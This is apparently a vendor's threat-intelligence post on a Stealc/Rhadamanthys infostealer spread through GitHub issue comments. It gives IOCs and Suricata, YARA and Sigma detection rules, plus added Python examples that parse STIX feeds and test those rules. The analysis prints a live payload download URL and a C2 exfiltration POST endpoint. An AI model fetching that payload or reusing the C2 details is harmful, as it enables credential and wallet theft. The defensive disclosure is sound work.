Stealc/Rhadamanthys: Anatomy of a GitHub Supply Chain Infostealer
- Patrick Duggan
- Nov 25, 2025
- 5 min read
Categories: Malware Analysis, Threat Intelligence, IOCs Tags: #Stealc #Rhadamanthys #Infostealer #SupplyChain #GitHub #MITRE
Executive Summary
We caught an information stealer campaign distributing malware through GitHub issue comments. This post documents the complete technical analysis: the malware family, the C2 infrastructure, the attack chain, and every IOC you need to defend your organization.
• Block `149.102.156.62` (Contabo GmbH, Germany)
• Block hash `23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68`
• Monitor for PowerShell downloading from `github.com/*/releases/download/*/`
• Subscribe to our STIX feed: `https://analytics.dugganusa.com/api/v1/stix-feed`
Malware Identification
VirusTotal Analysis
Hash (SHA256):

```
23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68
```
Detection Rate: 18/70 engines (25.7%)
Family Classification:

| Sandbox | Classification |
|---------|----------------|
| CAPE Sandbox | Stealc |
| Multiple AVs | Rhadamanthys |
| Generic | Trojan.GenericKD.77873995 |
• `Trojan.GenericKD.77873995` (BitDefender)
• `Win64/Agent.ECK trojan` (ESET)
• `TR/AD.Nekark.wzwvf` (Avira)
• `Archive.Trojan.Agent.3AOT25` (DrWeb)
• `Win64.Trojan.Agent.Ftgl` (Tencent)
• `Malicious (score: 99)` (SecureAge)
Behavioral Tags
• `detect-debug-environment` - Anti-analysis checks
• `long-sleeps` - Execution delays to evade sandboxes
• `contains-pe` - Executable payload inside ZIP
• `zip` - Archive-based delivery
Attack Chain
```
┌─────────────────────────────────────────────────────────────────────────┐
│                          ATTACK CHAIN DIAGRAM                           │
└─────────────────────────────────────────────────────────────────────────┘

[1] INITIAL ACCESS                    [2] EXECUTION
━━━━━━━━━━━━━━━━━━━                   ━━━━━━━━━━━━━━━━━━━
GitHub Issue Comment                  PowerShell Loader
       │                                      │
       ▼                                      ▼
┌─────────────┐                       ┌─────────────────┐
│ "Hey, try   │                       │  kkwerii.ps1  │
│ this fix!"  │                       │               │
│             │──────────────────────▶│ Downloads ZIP │
│ [ZIP file]  │                       │ from GitHub   │
└─────────────┘                       └───────┬───────┘
                                              │
[3] PAYLOAD DELIVERY                  [4] DATA EXFIL
━━━━━━━━━━━━━━━━━━━━                  ━━━━━━━━━━━━━━━━━━━
GitHub Releases                       C2 Server
        │                                     │
        ▼                                     ▼
┌────────────────┐                    ┌─────────────────┐
│ automatic-octo-│                    │ 149.102.156.62  │
│ parakeet/      │                    │                 │
│ releases/      │───────────────────▶│ POST /5dc6...   │
│ kkwerii.zip    │                    │ .php            │
└────────────────┘                    └─────────────────┘
```
Step-by-Step Execution
1. Initial Access
   • Sleeper account posts "helpful" ZIP to GitHub issue
   • Account aged 90-365 days, dormant 90-180 days
   • Targets popular open source projects
2. Execution
   • Victim downloads ZIP thinking it's a legitimate fix
   • ZIP contains PowerShell loader (`kkwerii.ps1`)
   • PowerShell script executes
3. Payload Delivery
   • Downloads second-stage from GitHub Releases (see Network Indicators below)
4. Data Exfil
   • Stealer collects credentials, crypto wallets, browser data
   • Exfils via HTTP POST to C2 (see C2 Server Details below)
Command & Control Infrastructure
C2 Server Details
| Attribute | Value |
|-----------|-------|
| IP Address | `149.102.156.62` |
| Port | 80 (HTTP) |
| Endpoint | `/5dc60508ab2db3b4.php` |
| Method | POST |
| Provider | Contabo GmbH |
| Country | Germany (DE) |
| ASN | AS51167 |
Network Indicators
Contacted IPs:

```
149.102.156.62:80    - C2 Server (Contabo GmbH)
140.82.114.4:443     - github.com (legitimate)
185.199.109.133:443  - release-assets.githubusercontent.com (legitimate)
140.82.112.5:443     - api.github.com (legitimate)
```
DNS Lookups:

```
github.com                            → 140.82.114.4
release-assets.githubusercontent.com  → 185.199.109.133
api.github.com                        → 140.82.112.5
```
HTTP Conversations:

```http
POST http://149.102.156.62/5dc60508ab2db3b4.php HTTP/1.1
[Exfiltrated data]
```

```http
GET https://github.com/winchmrsmilegodsgf/automatic-octo-parakeet/releases/download/Testing/kkwerii.ps1
User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1237
```
What Stealc/Rhadamanthys Steals
Target Data
| Category | Specifics |
|----------|-----------|
| Browser Credentials | Chrome, Firefox, Edge passwords |
| Browser Cookies | Session tokens, auth cookies |
| Autofill Data | Credit cards, addresses, names |
| Cryptocurrency Wallets | MetaMask, Exodus, Electrum, etc. |
| Discord Tokens | Account takeover capability |
| Telegram Sessions | Session hijacking |
| Steam Credentials | Gaming account theft |
| System Info | OS version, hardware, installed software |
| Screenshots | Desktop capture |
| Clipboard | Copy/paste monitoring |
Why Infostealers Are Dangerous
1. Immediate Impact: Stolen credentials = instant account takeover
2. Lateral Movement: Enterprise credentials → internal network access
3. Financial Loss: Crypto wallets drained immediately
4. Persistent Access: Session tokens work until rotated
5. Supply Chain Risk: One developer = access to production systems
GitHub Accounts (Suspended)
These accounts distributed the malware. All have been suspended by GitHub:
| Account | Status | Activity |
|---------|--------|----------|
| FireSuper | SUSPENDED | Posted malware ZIPs |
| rampubg14-cmyk | SUSPENDED | Same malware hash as FireSuper |
| anuxagfr | SUSPENDED | Distribution network |
| winchmrsmilegodsgf | SUSPENDED | Hosted payload on GitHub Releases |
Key Finding: FireSuper and rampubg14-cmyk used the EXACT SAME malware file (identical SHA-256). This proves coordinated infrastructure.
MITRE ATT&CK Mapping
| Tactic | Technique | ID | Description |
|--------|-----------|-----|-------------|
| Initial Access | Phishing: Spearphishing Link | T1566.002 | GitHub issue links |
| Execution | User Execution: Malicious File | T1204.002 | ZIP download |
| Execution | Command and Scripting Interpreter: PowerShell | T1059.001 | kkwerii.ps1 loader |
| Defense Evasion | Obfuscated Files | T1027 | Packed executable |
| Defense Evasion | Virtualization/Sandbox Evasion | T1497 | Anti-debug checks |
| Credential Access | Credentials from Password Stores | T1555 | Browser credential theft |
| Credential Access | Steal Web Session Cookie | T1539 | Session token theft |
| Collection | Clipboard Data | T1115 | Clipboard monitoring |
| Collection | Screen Capture | T1113 | Desktop screenshots |
| Exfiltration | Exfiltration Over C2 Channel | T1041 | HTTP POST to C2 |
| Command and Control | Application Layer Protocol: Web | T1071.001 | HTTP C2 |
Indicators of Compromise (IOCs)
File Indicators

```yaml
# SHA256 Hashes
- 23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68  # Main payload
```

Network Indicators

```yaml
# C2 Infrastructure
- ip: 149.102.156.62
  port: 80
  endpoint: /5dc60508ab2db3b4.php
  method: POST
  provider: Contabo GmbH
  country: DE
```

Detection Signatures
Suricata/Snort:

```
alert http $HOME_NET any -> 149.102.156.62 any (msg:"MALWARE Stealc/Rhadamanthys C2"; flow:established,to_server; content:"POST"; http_method; content:"/5dc60508ab2db3b4.php"; http_uri; classtype:trojan-activity; sid:1000001; rev:1;)
```
YARA:

```yara
rule Stealc_Rhadamanthys_Loader {
    meta:
        description = "Detects Stealc/Rhadamanthys PowerShell loader"
        author = "DugganUSA LLC"
        date = "2025-11-25"
        hash = "23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68"
    strings:
        $ps1  = "WindowsPowerShell" ascii
        $url1 = "github.com" ascii
        $url2 = "releases/download" ascii
        $ext  = ".ps1" ascii
    condition:
        all of them
}
```
Sigma:

```yaml
title: Stealc/Rhadamanthys GitHub Delivery
status: experimental
description: Detects PowerShell downloading from GitHub releases (common malware delivery)
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'github.com'
            - 'releases/download'
    condition: selection
falsepositives:
    - Legitimate software installation scripts
level: high
```
STIX 2.1 Bundle
All IOCs are available in our public STIX feed:
```bash
curl https://analytics.dugganusa.com/api/v1/stix-feed
```

Direct IOC queries:

```bash
# Get Pattern 38 indicators
curl "https://analytics.dugganusa.com/api/v1/stix-feed?min_confidence=80" | jq '.objects[] | select(.pattern | contains("149.102.156.62"))'
```
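As an added example (not the feed's own tooling and not code from the original post), the Python below does offline what the jq one-liner does against the live feed: it filters a STIX 2.1 bundle by confidence, selects indicators whose pattern mentions the C2 IP, and turns the STIX patterns into a blocklist grouped by object path. Only `objects[].pattern` and the `min_confidence` parameter come from the page; the rest of the object layout, the bundle itself, its identifiers and the low-confidence `203.0.113.10` entry are constructed assumptions.

```python
"""Extract atomic IOCs from a STIX 2.1 indicator bundle (added example).

The bundle below is constructed; the feed's object layout beyond
`objects[].pattern` and `?min_confidence=` is assumed, not taken from the page.
"""
import json
import re

# STIX patterns look like [ipv4-addr:value = '1.2.3.4'] or
# [file:hashes.'SHA-256' = '<hex>']; capture each object-path/value pair.
COMPARISON = re.compile(r"([a-z0-9-]+:[A-Za-z0-9_.'-]+)\s*=\s*'([^']+)'")

# Constructed sample bundle shaped like a STIX 2.1 feed response.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000002",
         "pattern_type": "stix", "confidence": 90,
         "pattern": "[ipv4-addr:value = '149.102.156.62']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000003",
         "pattern_type": "stix", "confidence": 90,
         "pattern": "[file:hashes.'SHA-256' = "
                    "'23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68']"},
        # Low-confidence entry using an RFC 5737 documentation address (constructed)
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000004",
         "pattern_type": "stix", "confidence": 40,
         "pattern": "[ipv4-addr:value = '203.0.113.10']"},
        {"type": "identity", "id": "identity--00000000-0000-4000-8000-000000000005",
         "name": "example feed publisher"},
    ],
})


def select_indicators(bundle_json: str, min_confidence: int = 80) -> list[dict]:
    """Keep indicator objects at or above min_confidence (mirrors ?min_confidence=80)."""
    bundle = json.loads(bundle_json)
    return [
        obj for obj in bundle.get("objects", [])
        if obj.get("type") == "indicator" and obj.get("confidence", 0) >= min_confidence
    ]


def atomic_iocs(pattern: str) -> list[tuple[str, str]]:
    """Return (object_path, value) pairs found in one STIX pattern string."""
    return COMPARISON.findall(pattern)


def build_blocklist(bundle_json: str, min_confidence: int = 80) -> dict[str, set[str]]:
    """Group high-confidence IOC values by their STIX object path."""
    blocklist: dict[str, set[str]] = {}
    for ind in select_indicators(bundle_json, min_confidence):
        for path, value in atomic_iocs(ind["pattern"]):
            blocklist.setdefault(path, set()).add(value)
    return blocklist


def indicators_mentioning(bundle_json: str, needle: str) -> list[str]:
    """Same filter as the page's jq: select(.pattern | contains(needle))."""
    return [ind["id"] for ind in select_indicators(bundle_json, 0) if needle in ind["pattern"]]


if __name__ == "__main__":
    for path, values in sorted(build_blocklist(SAMPLE_BUNDLE).items()):
        print(path, sorted(values))
```

The confidence threshold is applied before pattern parsing so that a noisy low-confidence indicator never reaches a firewall or EDR blocklist; the regex handles only simple single-comparison patterns, which is what the page's own IP and hash indicators are.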
Defensive Recommendations
Immediate Actions
1. Block C2 IP:

```bash
# Firewall rule
iptables -A OUTPUT -d 149.102.156.62 -j DROP
```

2. Block File Hash:
   - Add to EDR blocklist
   - Add to email gateway

3. Hunt for Compromise:

```sql
-- Splunk
index=proxy dest_ip=149.102.156.62 | stats count by src_ip, user

-- KQL (Microsoft Sentinel)
DeviceNetworkEvents | where RemoteIP == "149.102.156.62"
```
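Added example, not part of the original analysis: a Python harness that applies the Sigma selection and the Suricata match conditions from the Detection Signatures section, plus the Splunk `stats count by src_ip, user` aggregation from the hunt query above, to constructed process_creation and proxy events. The event classes and the sample hosts, users and private addresses are assumptions; the IOCs and rule terms are the page's. It also shows why the Sigma rule lists installer scripts as a false positive: a legitimate `gh.msi` download from GitHub Releases trips the same selection.

```python
"""Run the page's Sigma/Suricata logic and hunt aggregation over sample events.

Added example; not the page's own tooling. Event shapes are assumed, chosen to
resemble Sysmon/EDR process_creation records and proxy HTTP logs.
"""
from collections import Counter
from dataclasses import dataclass

C2_IP = "149.102.156.62"          # from the page's IOC list
C2_URI = "/5dc60508ab2db3b4.php"  # from the page's IOC list
# The three CommandLine|contains|all terms from the page's Sigma rule
SIGMA_TERMS = ("powershell", "github.com", "releases/download")


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    user: str
    command_line: str


@dataclass(frozen=True)
class HttpEvent:
    src_ip: str
    user: str
    dest_ip: str
    method: str
    uri: str


def sigma_github_loader_match(ev: ProcessEvent) -> bool:
    """Sigma 'contains' is a case-insensitive substring test; '|all' ANDs the terms."""
    cl = ev.command_line.lower()
    return all(term in cl for term in SIGMA_TERMS)


def suricata_c2_match(ev: HttpEvent) -> bool:
    """Mirrors the Suricata rule: POST to the C2 IP with the C2 URI present in http_uri."""
    return ev.dest_ip == C2_IP and ev.method.upper() == "POST" and C2_URI in ev.uri


def hunt_c2_sources(events: list[HttpEvent]) -> dict[tuple[str, str], int]:
    """Equivalent of the Splunk query: dest_ip=<C2> | stats count by src_ip, user."""
    return dict(Counter((ev.src_ip, ev.user) for ev in events if ev.dest_ip == C2_IP))


# Constructed sample telemetry; hosts, users and addresses are placeholders.
PROCESS_EVENTS = [
    ProcessEvent("dev-ws-01", "alice", r"C:\Windows\System32\cmd.exe /c dir"),
    ProcessEvent("dev-ws-01", "alice",
                 'powershell.exe -Command "Invoke-WebRequest '
                 'https://github.com/example-org/example-repo/releases/download/Testing/loader.ps1"'),
    # Legitimate installer: matches the rule, which is the documented false positive
    ProcessEvent("build-02", "ci",
                 "PowerShell.exe -File setup.ps1 https://GitHub.com/cli/cli/releases/download/v2.0.0/gh.msi"),
    ProcessEvent("dev-ws-02", "bob", "powershell.exe Get-Process"),
]

HTTP_EVENTS = [
    HttpEvent("10.0.0.5", "alice", "149.102.156.62", "POST", "/5dc60508ab2db3b4.php"),
    HttpEvent("10.0.0.5", "alice", "149.102.156.62", "POST", "/5dc60508ab2db3b4.php"),
    HttpEvent("10.0.0.9", "carol", "140.82.114.4", "GET", "/cli/cli/releases/download/v2.0.0/gh.msi"),
    # Contact with the C2 IP that the Suricata rule would not fire on, but the hunt query still lists
    HttpEvent("10.0.0.7", "dave", "149.102.156.62", "GET", "/"),
]


def run_detections() -> dict[str, object]:
    """Apply every check to the sample data and return the results by name."""
    return {
        "sigma_hits": [ev.host for ev in PROCESS_EVENTS if sigma_github_loader_match(ev)],
        "suricata_hits": [ev.src_ip for ev in HTTP_EVENTS if suricata_c2_match(ev)],
        "hunt": hunt_c2_sources(HTTP_EVENTS),
    }


if __name__ == "__main__":
    for name, result in run_detections().items():
        print(f"{name}: {result}")
```

Note the difference in scope between the two network checks: the Suricata rule requires the POST to the known `.php` endpoint, while the hunt query flags any connection to the C2 IP, so the hunt output includes the GET from `10.0.0.7` that the signature ignores. That is the intended split: signatures stay precise for alerting, hunts stay broad for scoping.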
Long-term Mitigations
1. User Awareness: Don't download ZIPs from GitHub issue comments
2. PowerShell Logging: Enable ScriptBlock logging
3. Network Monitoring: Alert on connections to bulletproof hosting
4. Threat Intel Feeds: Subscribe to STIX feeds (like ours)
Timeline
| Date | Event |
|------|-------|
| ~Aug 2025 | Sleeper accounts created |
| Nov 23, 2025 | Accounts activated, started posting malware |
| Nov 23, 2025 | DugganUSA detects Pattern 38 |
| Nov 24, 2025 | C2 infrastructure traced via VirusTotal |
| Nov 24, 2025 | 36 reports sent to [email protected] |
| Nov 25, 2025 | 4 accounts confirmed SUSPENDED |
| Nov 25, 2025 | C2 IP blocked, 16 repos warned |
| Nov 25, 2025 | This analysis published |
References
• VirusTotal Report: https://www.virustotal.com/gui/file/23c909ea83cd7428a37189f228f4782693c1726381c886712135defca5924a68
• Our STIX Feed: https://analytics.dugganusa.com/api/v1/stix-feed
• MITRE ATT&CK: https://attack.mitre.org/
• Stealc Analysis (Sekoia): https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers/
• Rhadamanthys Analysis: https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
About This Analysis
• Pattern 38 Scanner (GitHub account behavior analysis)
• VirusTotal API (malware analysis)
• STIX 2.1 Feed (IOC distribution)
• Judge Dredd (automated disclosure)
Cost: $0 (existing Claude Code subscription + Azure infrastructure)
Time: 48 hours from detection to full analysis
We publish this freely under our Democratic Sharing Law: threat intelligence should be accessible to everyone, not just enterprises with $50K/year subscriptions.
*"The Law doesn't sleep. Neither does our threat intel pipeline."* - Judge Dredd
Patrick Duggan DugganUSA LLC [email protected] https://www.dugganusa.com